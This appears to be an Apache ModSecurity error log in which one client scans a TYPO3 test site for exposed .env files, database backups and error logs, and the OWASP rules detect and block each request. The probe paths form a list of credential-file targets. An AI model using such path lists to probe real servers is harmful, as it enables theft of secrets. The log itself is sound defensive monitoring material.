[Sat Mar 21 04:08:00.154322 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSQAAAAA"]
[Sat Mar 21 04:08:00.154485 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSQAAAAA"]
[Sat Mar 21 04:08:00.448790 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSgAAAAA"]
[Sat Mar 21 04:08:00.448946 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSgAAAAA"]
[Sat Mar 21 04:08:00.449252 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSgAAAAA"]
[Sat Mar 21 04:08:00.743304 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSwAAAAA"]
[Sat Mar 21 04:08:00.743505 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSwAAAAA"]
[Sat Mar 21 04:08:00.743687 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "ab4LkLVOPlV6sIlrZCplSwAAAAA"]
[Sat Mar 21 04:08:01.038375 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTAAAAAA"]
[Sat Mar 21 04:08:01.038530 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTAAAAAA"]
[Sat Mar 21 04:08:01.038696 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTAAAAAA"]
[Sat Mar 21 04:08:01.332912 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTQAAAAA"]
[Sat Mar 21 04:08:01.333079 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTQAAAAA"]
[Sat Mar 21 04:08:01.333261 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTQAAAAA"]
[Sat Mar 21 04:08:01.627785 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTgAAAAA"]
[Sat Mar 21 04:08:01.627985 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTgAAAAA"]
[Sat Mar 21 04:08:01.628169 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "ab4LkbVOPlV6sIlrZCplTgAAAAA"]
[Sat Mar 21 04:08:01.922068 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_backup.sql
[Sat Mar 21 04:08:02.217508 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUAAAAAA"]
[Sat Mar 21 04:08:02.217738 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUAAAAAA"]
[Sat Mar 21 04:08:02.217956 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUAAAAAA"]
[Sat Mar 21 04:08:02.512584 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUQAAAAA"]
[Sat Mar 21 04:08:02.512745 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUQAAAAA"]
[Sat Mar 21 04:08:02.512899 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUQAAAAA"]
[Sat Mar 21 04:08:02.812037 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUgAAAAA"]
[Sat Mar 21 04:08:02.812192 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUgAAAAA"]
[Sat Mar 21 04:08:02.812331 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab4LkrVOPlV6sIlrZCplUgAAAAA"]
[Sat Mar 21 04:08:03.106691 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplUwAAAAA"]
[Sat Mar 21 04:08:03.106858 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplUwAAAAA"]
[Sat Mar 21 04:08:03.107029 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplUwAAAAA"]
[Sat Mar 21 04:08:03.400964 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/error.log
[Sat Mar 21 04:08:03.695353 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplVQAAAAA"]
[Sat Mar 21 04:08:03.695512 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplVQAAAAA"]
[Sat Mar 21 04:08:03.695662 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplVQAAAAA"]
[Sat Mar 21 04:08:03.989822 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplVgAAAAA"]
[Sat Mar 21 04:08:03.989980 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplVgAAAAA"]
[Sat Mar 21 04:08:03.990170 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "ab4Lk7VOPlV6sIlrZCplVgAAAAA"]
[Sat Mar 21 04:08:04.284341 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "ab4LlLVOPlV6sIlrZCplVwAAAAA"]
[Sat Mar 21 04:08:04.284512 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "ab4LlLVOPlV6sIlrZCplVwAAAAA"]
[Sat Mar 21 04:08:04.284672 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "ab4LlLVOPlV6sIlrZCplVwAAAAA"]
[Sat Mar 21 04:08:04.579093 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "ab4LlLVOPlV6sIlrZCplWAAAAAA"]
[Sat Mar 21 04:08:04.579250 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "ab4LlLVOPlV6sIlrZCplWAAAAAA"]
